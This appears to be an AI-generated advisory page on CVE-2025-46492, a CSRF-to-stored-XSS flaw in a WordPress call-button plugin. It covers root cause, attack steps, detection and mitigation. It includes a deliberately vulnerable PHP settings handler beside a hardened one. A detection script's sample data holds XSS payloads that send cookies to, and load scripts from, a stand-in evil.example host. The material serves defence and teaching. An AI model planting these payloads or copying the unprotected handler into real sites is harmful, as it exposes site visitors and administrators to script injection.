CVE-2025-46492 Overview
CVE-2025-46492 is a Cross-Site Request Forgery (CSRF) vulnerability in the Call Now PHT Blog WordPress plugin (call-now-coccoc-pht-blog) developed by Pham Thanh. This vulnerability allows attackers to chain CSRF with Stored Cross-Site Scripting (XSS), enabling malicious actors to inject persistent scripts into the affected WordPress site through forged requests.
The vulnerability exists because the plugin does not verify a WordPress nonce on the request that saves its settings, so it cannot tell a submission from its own admin form apart from one forged on another site. An attacker can therefore craft a request that, when an authenticated administrator's browser submits it, stores attacker-controlled JavaScript in the plugin's settings. The stored payload then runs in the browsers of visitors or administrators who load pages where the plugin renders that setting.
Critical Impact
An attacker who gets an administrator to load a forged request can plant JavaScript that runs for every subsequent visitor or administrator who views the affected output. WordPress sets its authentication cookies with the HttpOnly flag, so the payload cannot simply read them; the realistic outcomes are actions performed with the victim administrator's session from inside the dashboard (for example creating an additional administrator account, or editing plugin or theme files, using the nonces the script can read from admin pages), defacement, redirecting visitors to attacker-controlled sites, and serving malware or phishing content to visitors.
Affected Products
- Call Now PHT Blog WordPress plugin (slug call-now-coccoc-pht-blog), versions up to and including 2.4.1
- Any WordPress installation on which an affected version of the plugin is installed and active
Discovery Timeline
- 2025-04-24 - CVE-2025-46492 published to NVD
- 2026-04-23 - Last updated in NVD database
Technical Details for CVE-2025-46492
Vulnerability Analysis
This vulnerability combines two distinct weaknesses: Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS). The CSRF component lets an attacker make an authenticated WordPress administrator's browser submit a request the administrator never intended. Because the plugin does not implement WordPress's standard CSRF protection (a nonce emitted with wp_nonce_field() and checked with check_admin_referer() or wp_verify_nonce()), the forged request is processed as if it had come from the dashboard.
The Stored XSS component allows the value carried by that request, including JavaScript, to be saved persistently in the plugin's settings. Once stored, the script executes whenever the affected content is rendered, affecting every user who views the compromised pages. The attack is launched over the network with low complexity; sites with several administrators, or with administrators who browse other sites while logged in to the dashboard, are the most exposed.
The CVSS scope metric is Changed: the forged request targets only the plugin's settings, but the injected script runs in the browsers of the site's visitors and administrators, outside the security authority of the vulnerable component, and can compromise the WordPress installation as a whole.
Root Cause
The root cause of this vulnerability is improper implementation of security controls within the Call Now PHT Blog plugin. Specifically:
Missing CSRF Token Validation: The code path that saves the plugin's settings does not verify a WordPress nonce, so a request forged from another origin is processed exactly like one submitted from the plugin's own settings form.
Insufficient Input Sanitization: User-supplied input is stored without being reduced to the form the setting actually needs (for example sanitize_text_field() for a phone number or label), so markup and script survive the round trip into the database.
Missing Output Encoding: When the stored value is rendered, it is not escaped for the context it is placed in (esc_attr() inside an attribute, esc_html() in text, esc_url() in a link), so stored markup is interpreted by the browser instead of being displayed.
Attack Vector
The attack follows a chained exploitation path:
Reconnaissance: The attacker identifies a WordPress site running Call Now PHT Blog plugin version 2.4.1 or earlier.
Payload Crafting: The attacker creates a malicious HTML page containing a hidden form that targets the vulnerable plugin endpoint with XSS payload.
Social Engineering: The attacker tricks a WordPress administrator into visiting the malicious page while authenticated to their WordPress dashboard.
CSRF Execution: The hidden form auto-submits, sending the malicious request with the administrator's session cookies.
XSS Storage: The malicious JavaScript payload is stored in the plugin's settings or database.
Payload Execution: When any user visits pages where the plugin renders its content, the stored XSS payload executes in their browser context.
The attacker needs no account on the target site, but the attack does require user interaction: an administrator must load the attacker's page while holding a valid dashboard session. Both properties are reflected in the vulnerability's CVSS characteristics (no privileges required, user interaction required).
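The following is an added example, not code from the Call Now PHT Blog plugin, written to make the root cause and the attack path above concrete. It is a minimal WordPress settings page written twice: first with the three defects the advisory describes (no nonce check, no input sanitization, no output escaping), then hardened with the standard WordPress controls. The option and field names (pht_demo_*), the menu slug and the front-end call-now link are assumptions for illustration only. It runs inside WordPress as a plugin or mu-plugin, not stand-alone.

```php
<?php
/*
 * Added example, not code from the Call Now PHT Blog plugin. Option, field
 * and page names (pht_demo_*) are assumed. Requires a WordPress runtime.
 */

// ---- Vulnerable pattern: the CSRF -> stored XSS chain ---------------------------
function pht_demo_vuln_save() {
    // Any POST that reaches this handler is trusted. A hidden form on an attacker's
    // page that auto-submits to the settings page lands here with the admin's
    // cookies attached and nothing proving the admin intended the change.
    if ( isset( $_POST['pht_demo_phone'] ) ) {
        update_option( 'pht_demo_phone', $_POST['pht_demo_phone'] ); // raw input stored as-is
    }
}
function pht_demo_vuln_render() {
    pht_demo_vuln_save();
    $phone = get_option( 'pht_demo_phone', '' );
    echo '<form method="post">';
    // Unescaped output: a stored value such as  "><script>...</script>  closes the
    // attribute and executes for every administrator who opens this page.
    echo '<input type="text" name="pht_demo_phone" value="' . $phone . '">';
    echo '<button type="submit">Save</button></form>';
}

// ---- Hardened pattern ----------------------------------------------------------
function pht_demo_safe_save() {
    if ( ! isset( $_POST['pht_demo_phone'] ) ) {
        return;
    }
    // 1. Capability check: only users allowed to manage options may save.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.', 403 );
    }
    // 2. CSRF check: the request must carry a nonce bound to this action and this
    //    user. check_admin_referer() stops the request with a 403 page otherwise.
    check_admin_referer( 'pht_demo_save_settings', 'pht_demo_nonce' );
    // 3. Input sanitization: unslash, then reduce to a plain single-line string.
    $phone = sanitize_text_field( wp_unslash( $_POST['pht_demo_phone'] ) );
    update_option( 'pht_demo_phone', $phone );
}
function pht_demo_safe_render() {
    pht_demo_safe_save();
    $phone = get_option( 'pht_demo_phone', '' );
    echo '<form method="post">';
    wp_nonce_field( 'pht_demo_save_settings', 'pht_demo_nonce' ); // hidden nonce field
    // 4. Output escaping for the attribute context the value is placed in.
    echo '<input type="text" name="pht_demo_phone" value="' . esc_attr( $phone ) . '">';
    echo '<button type="submit">Save</button></form>';
}

// Register only the hardened page; the vulnerable functions stay for comparison.
add_action( 'admin_menu', function () {
    add_options_page( 'PHT Demo', 'PHT Demo', 'manage_options', 'pht-demo-safe', 'pht_demo_safe_render' );
} );

// The same value is rendered on every front-end page by a call-now button in
// plugins of this kind, so it must be escaped for that context as well.
add_action( 'wp_footer', function () {
    $phone = get_option( 'pht_demo_phone', '' );
    if ( $phone !== '' ) {
        echo '<a class="pht-demo-call" href="' . esc_url( 'tel:' . $phone ) . '">' . esc_html( $phone ) . '</a>';
    }
} );
```

The nonce alone closes the CSRF hole, because a page on another origin cannot read it out of the admin form. The sanitization and escaping steps are still needed: they make sure that a value which does get saved by some other path (a compromised account, a direct database edit) cannot execute, which is the stored XSS half of the chain.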
Detection Methods for CVE-2025-46492
Indicators of Compromise
- Unexpected JavaScript code or <script> tags in plugin settings or database fields related to Call Now PHT Blog
- Settings changes for the plugin that no administrator remembers making, in particular ones logged shortly after an administrator visited an external site while logged in
- Reports from users about unexpected redirects, pop-ups, or browser warnings when visiting the site
- Browser console errors or network requests to unfamiliar external domains originating from plugin-rendered content
Detection Strategies
- Review WordPress plugin settings for Call Now PHT Blog and inspect for suspicious script content
- Deploy a Content Security Policy with a report-uri/report-to endpoint on the public site to surface injected inline scripts and loads from unknown hosts; note that the WordPress dashboard itself depends on inline scripts, so a strict policy on wp-admin generally has to be applied in report-only mode
- Correlate option changes with the web server access log: a forged request appears as a POST to the plugin's settings endpoint whose Referer or Origin header is absent or names a foreign host, which a genuine dashboard submission never produces
- Use web application security scanners to identify stored XSS payloads in the database
Monitoring Recommendations
- Enable comprehensive WordPress activity logging to track all plugin settings modifications
- Deploy a Web Application Firewall (WAF) configured to detect CSRF and XSS attack patterns
- Regularly scan the WordPress database for suspicious content patterns in plugin-related tables
- Monitor browser console outputs during site testing for unexpected script execution
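Two of the checks listed under Detection Strategies and Monitoring Recommendations can be run offline against exports. The script below is an added example, not part of the advisory or the plugin: it scans a set of wp_options rows (plain and PHP-serialized values) for script indicators, and parses Apache combined-format access-log lines to flag state-changing wp-admin POSTs whose Referer is missing or from another host. The option names, the option values and the log lines are constructed sample data; adjust the LIKE filter you use to export real rows to the plugin's actual option names.

```php
<?php
/*
 * Added example (not from the plugin or the advisory). Sample options and log
 * lines below are constructed; option names are assumed. Run: php detect_pht.php
 */

// Patterns that have no business in a phone-number or button-label setting.
const XSS_PATTERNS = [
    '/<\s*script\b/i',                        // <script ...>
    '/\bon[a-z]+\s*=/i',                      // onerror=, onload=, onmouseover=
    '/javascript\s*:/i',                      // javascript: URIs
    '/<\s*(iframe|svg|img|object|embed)\b/i', // tags commonly used to carry handlers
    '/&#x?[0-9a-f]+;?/i',                     // numeric entities used to hide the above
];

/** Flatten a plain or PHP-serialized option value into its string leaves. */
function option_strings(string $value): array {
    // WordPress serializes array options; never let unserialize instantiate objects.
    $decoded = @unserialize($value, ['allowed_classes' => false]);
    if ($decoded === false && $value !== 'b:0;') {
        return [$value];                      // plain string option
    }
    if (!is_array($decoded)) {
        return [(string) $decoded];
    }
    $out = [];
    array_walk_recursive($decoded, function ($leaf) use (&$out) {
        if (is_string($leaf)) {
            $out[] = $leaf;
        }
    });
    return $out;
}

/** Return [option_name => offending string] for rows matching any XSS pattern. */
function scan_options(array $rows): array {
    $hits = [];
    foreach ($rows as $name => $value) {
        foreach (option_strings($value) as $s) {
            foreach (XSS_PATTERNS as $re) {
                if (preg_match($re, $s)) {
                    $hits[$name] = $s;
                    continue 3;               // next option row
                }
            }
        }
    }
    return $hits;
}

/** Parse an Apache combined-format line, or return null if it does not match. */
function parse_log_line(string $line): ?array {
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3], 'path' => $m[4],
            'status' => (int) $m[5], 'referer' => $m[6]];
}

/** Flag admin POSTs whose Referer is missing or belongs to a host other than the site. */
function cross_site_admin_posts(array $lines, string $site_host): array {
    $flagged = [];
    foreach ($lines as $line) {
        $r = parse_log_line($line);
        if ($r === null || $r['method'] !== 'POST') {
            continue;
        }
        if (!preg_match('#^/wp-admin/(options|admin|admin-post|admin-ajax)\.php#', $r['path'])) {
            continue;
        }
        $ref_host = $r['referer'] === '-' ? '' : (string) parse_url($r['referer'], PHP_URL_HOST);
        if (strcasecmp($ref_host, $site_host) !== 0) {
            $flagged[] = $r;
        }
    }
    return $flagged;
}

// Constructed sample rows, as an export of wp_options might look (names assumed).
$sample_options = [
    'pht_call_now_phone' => '+84 912 345 678',
    'pht_call_now_label' => 'Call now',
    'pht_call_now_style' => serialize(['color' => '#2b8', 'position' => 'right']),
    'pht_call_now_text'  => '"><img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">',
    'pht_call_now_extra' => serialize(['after' => '<script src="https://evil.example/a.js"></script>']),
];
// Constructed access-log lines: a genuine save, a forged save with a foreign Referer,
// a forged save with the Referer suppressed, and an unrelated GET.
$sample_log = [
    '203.0.113.7 - - [20/May/2025:10:01:02 +0000] "POST /wp-admin/options.php HTTP/1.1" 302 - "https://blog.example/wp-admin/options-general.php?page=pht-call-now" "Mozilla/5.0"',
    '203.0.113.7 - - [20/May/2025:10:05:41 +0000] "POST /wp-admin/options.php HTTP/1.1" 302 - "https://attacker.example/" "Mozilla/5.0"',
    '203.0.113.7 - - [20/May/2025:10:06:10 +0000] "POST /wp-admin/admin-post.php HTTP/1.1" 302 - "-" "Mozilla/5.0"',
    '198.51.100.4 - - [20/May/2025:10:07:00 +0000] "GET /wp-admin/options-general.php HTTP/1.1" 200 5123 "https://blog.example/wp-admin/" "Mozilla/5.0"',
];

foreach (scan_options($sample_options) as $name => $s) {
    printf("[XSS indicator] %s => %s\n", $name, $s);
}
foreach (cross_site_admin_posts($sample_log, 'blog.example') as $r) {
    printf("[cross-site POST] %s %s at %s referer=%s\n", $r['ip'], $r['path'], $r['time'], $r['referer']);
}
```

On the sample data the scan reports pht_call_now_text and pht_call_now_extra, and the log check flags the second and third POST lines. A missing Referer is flagged on purpose: browsers send a same-host Referer for dashboard form submissions, while an attacker's page can suppress it with a no-referrer policy. Expect some false positives from privacy extensions and from the numeric-entity pattern, which also matches harmless encoded characters; the point of the script is to shortlist rows and requests for a human to look at, not to clean anything automatically.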
How to Mitigate CVE-2025-46492
Immediate Actions Required
- Update Call Now PHT Blog plugin to a patched version when available from the developer
- If no patch is available, consider deactivating and removing the Call Now PHT Blog plugin until a fix is released
- Review current plugin settings for any suspicious or unexpected content and remove malicious entries
- Implement a Web Application Firewall (WAF) with CSRF and XSS protection rules
- If compromise is suspected, rotate administrator passwords and invalidate every existing session, either per user from the profile screen ("Log Out Everywhere Else") or for all users at once by replacing the authentication keys and salts in wp-config.php; then audit the user list for accounts the attacker may have added
Patch Information
As of the last NVD update, users should check for updates to the Call Now PHT Blog plugin through the WordPress plugin repository or contact the developer directly. For detailed vulnerability information and potential patches, refer to the Patchstack vulnerability database entry.
Workarounds
- Temporarily deactivate the Call Now PHT Blog plugin until a security patch is available; this is the only workaround that actually removes the vulnerable code path
- Restricting wp-admin and wp-login.php to trusted IP addresses (server-level firewall or .htaccess) reduces the dashboard's exposure but does not block this CVE: the forged request is sent by the administrator's own browser from an allowed address. Treat it as defence in depth, not as a fix
- Educate administrators about CSRF and advise them to use a separate browser profile for the dashboard and to log out before browsing untrusted sites
- WAF-style security plugins such as Wordfence or Sucuri cannot add the missing nonce check to the plugin's code, but their request rules can block submissions to the settings endpoint that carry obvious script payloads, which blunts the stored XSS half of the chain
# Root .htaccess: limit the login page to trusted addresses. Apache 2.4 syntax;
# the older Order/Deny/Allow form needs mod_access_compat, and Apache rejects a
# trailing "# comment" on a directive line, so comments go on their own lines.
# Requires AllowOverride AuthConfig (or All) for the document root.
# Replace 192.168.1.100 with the trusted admin address(es).
<Files "wp-login.php">
    Require ip 192.168.1.100
</Files>

# Place this in wp-admin/.htaccess. A <Directory> block is only valid in the
# server configuration, not in .htaccess files. admin-ajax.php is exempted
# because front-end features and logged-out visitors call it.
Require ip 192.168.1.100
<Files "admin-ajax.php">
    Require all granted
</Files>

# Behind a reverse proxy or CDN the client address is the proxy's unless
# mod_remoteip is configured; check REMOTE_ADDR before relying on this.
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.